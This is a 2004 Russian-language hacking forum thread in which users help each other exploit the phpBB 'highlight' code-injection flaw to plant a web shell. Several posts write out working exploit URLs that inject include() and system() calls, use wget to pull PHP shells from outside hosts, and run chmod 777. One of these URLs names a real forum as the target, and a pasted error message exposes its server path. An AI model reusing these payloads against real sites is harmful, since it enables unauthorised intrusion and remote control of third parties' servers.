ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Снова phpBB. Небольшой вопрос…(highlight)
  #1  
Старый 14.12.2004, 22:05
Аватар для -SX-
-SX-
Познающий
Регистрация: 04.10.2004
Сообщений: 86
Провел на форуме:
424769

Репутация: 11
Unhappy Снова phpBB. Небольшой вопрос…(highlight)

Не получается залить шелл. Я понимаю, что это звучит оооооочень глупо, но я уже не знаю, что делать… я уже все перепробовал… дело в том, что первый раз у меня получилось залить, но получилось не до конца… т.е. только половину файла ). На второй день уже нечего не получается залить… (. У меня настроение упало в несколько раз… сейчас сижу, голову ломаю, и думаю, где я мог проламерится…(… ну вроде все ж правильно…(
Просмотр директории, добавлять полные права, у меня выходит, а вот инклуд, или заливка, полный пи$%ец…
viewtopic.php?xxx=wget%20http://zattack.narod.ru/rem.php&t=10&highlight=%2527.include($_GET[xxx]).include.%2527
Ну ЧТО ТУТ НЕПРАВИЛЬНО??? Вить viewtopic.php?xxx=echo%20huitext&t=10&highlight=%2 527.include($_GET[xxx]).include.%2527 срабатывает…
ПЛЗ, очень прошу помогите разобраться в этой х%$@e...(
 
Ответить с цитированием

  #2  
Старый 14.12.2004, 22:34
Аватар для kyzmi4
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817

Репутация: 112
Отправить сообщение для kyzmi4 с помощью ICQ
По умолчанию

попробуй так.
http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=pwd;ls% 20-l;wget%20http://docentattack.narod.ru/p.php

Последний раз редактировалось kyzmi4; 14.12.2004 в 22:37..
 
Ответить с цитированием

  #3  
Старый 14.12.2004, 22:36
Аватар для SHiTS
SHiTS
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
Провел на форуме:
144460

Репутация: 39
Отправить сообщение для SHiTS с помощью ICQ
По умолчанию

как стать хацкером?
 
Ответить с цитированием

  #4  
Старый 14.12.2004, 22:39
Аватар для kyzmi4
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817

Репутация: 112
Отправить сообщение для kyzmi4 с помощью ICQ
По умолчанию

Цитата:
Сообщение от SHiTS  
как стать хацкером?
Это вопрос риторический. Для того что-бы немного разбиратя в этом всем.
Я прочитал книги:
Html;
css;
Linux;
PHP5;
Javascript.
Почитай =)
 
Ответить с цитированием

  #5  
Старый 14.12.2004, 23:10
Аватар для -SX-
-SX-
Познающий
Регистрация: 04.10.2004
Сообщений: 86
Провел на форуме:
424769

Репутация: 11
Unhappy

Цитата:
Сообщение от kyzmi4  
попробуй так.
http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=pwd;ls% 20-l;wget%20http://docentattack.narod.ru/p.php
------------------------------------------
PHP код:
Parse errorparse errorunexpected ';' in /var/www/virtual/ua/com/kievnet/forum/htdocs/viewtopic.php(1109) : regexp code on line 1

Fatal error
preg_replace() [function.preg-replace]: Failed evaluating codepreg_replace('#\b('\.$poster\=pwd;ls|-l;wget|http\://zattack\.narod\.ru/zz\.php)\b#i', '<span style="color:#FFA34F"><b>\1</b></span>', '><') in /var/www/virtual/ua/com/kievnet/forum/htdocs/viewtopic.php on line 1109 
Неее... фанарь... не работает (((

Последний раз редактировалось -SX-; 14.12.2004 в 23:29..
 
Ответить с цитированием

  #6  
Старый 15.12.2004, 00:22
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

Парень, ты наверное немного ошибся:
правильно будет так:
Цитата:
highlight=%2527.system($_GET[id]).%2527&id=wget url...
а ты пытаешься выпонить системную команду, когда сам пишешь include($_GET[xxx])
расскажи как ты добавляешь полные права...
.htaccess правишь что-ли?
 
Ответить с цитированием

  #7  
Старый 15.12.2004, 01:25
Аватар для -SX-
-SX-
Познающий
Регистрация: 04.10.2004
Сообщений: 86
Провел на форуме:
424769

Репутация: 11
Unhappy

Цитата:
Сообщение от virgoz  
Парень, ты наверное немного ошибся:
правильно будет так: viewtopic.php?t=1&highlight=%2527.system($_GET[id]).%2527&id=wget%20http://zattack.narod.ru/rem.php
а ты пытаешься выпонить системную команду, когда сам пишешь include($_GET[xxx])
Мля... все равно бага не пашет (
Цитата:
Сообщение от virgoz  
расскажи как ты добавляешь полные права...
viewtopic.php?t=1&highlight=%2527.die(%60cd%09../;chmod%09777%09_FILE.php_;pwd;ls%09-l%60).%2527
 
Ответить с цитированием

  #8  
Старый 15.12.2004, 19:50
Аватар для kyzmi4
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817

Репутация: 112
Отправить сообщение для kyzmi4 с помощью ICQ
По умолчанию

у тебя после wget стоит |
 
Ответить с цитированием

  #9  
Старый 15.12.2004, 21:08
Аватар для -SX-
-SX-
Познающий
Регистрация: 04.10.2004
Сообщений: 86
Провел на форуме:
424769

Репутация: 11
Unhappy

Цитата:
Сообщение от kyzmi4  
у тебя после wget стоит |
???
...=wget%20ht...
дык. %20 это ж пробел...
Или я что-то не так понял...???
 
Ответить с цитированием

  #10  
Старый 15.12.2004, 21:41
Аватар для -SX-
-SX-
Познающий
Регистрация: 04.10.2004
Сообщений: 86
Провел на форуме:
424769

Репутация: 11
Unhappy

Вот вчера ночью заметил еще один вариант…
Решил попробовать… для начала ввел
Цитата:
viewtopic.php?t=26&sid=01e4a9e8bcccb0c6b19d5509d94 9ab55&highlight=%2527.$poster=`pwd`.%2527
Вылезло место нахождения форума… /var/www/virtual/ua/com/kievnet/forum/htdocs
Все, я такой радый, прям как слон, уверен в победе, ввожу
Цитата:
http://forum.kievnet.com.ua/viewtopic.php?t=26&sid=01e4a9e8bcccb0c6b19d5509d94 9ab55&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd%20..;ls%20-l
. Т.е. чтоб передо мной высветился списочек файлов и их прав…
Место этого появилось )\b#i .
Ну этт вообще нормально???

Последний раз редактировалось -SX-; 15.12.2004 в 21:44..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Форумы 11 01.02.2007 12:21
phpBB <=2.0.18 "Login Dictionnary Attack" néM3S!s Forum for discussion of ANTICHAT 9 28.12.2005 17:27
Очередные дыры: phpBB 2.0.14 rsha1988 Форумы 8 08.05.2005 18:48
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group onyx3 Форумы 38 15.02.2005 16:25
Дыра в phpbb привела к массовым взломам сайтов ФРАЙ Мировые новости 7 19.12.2004 08:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ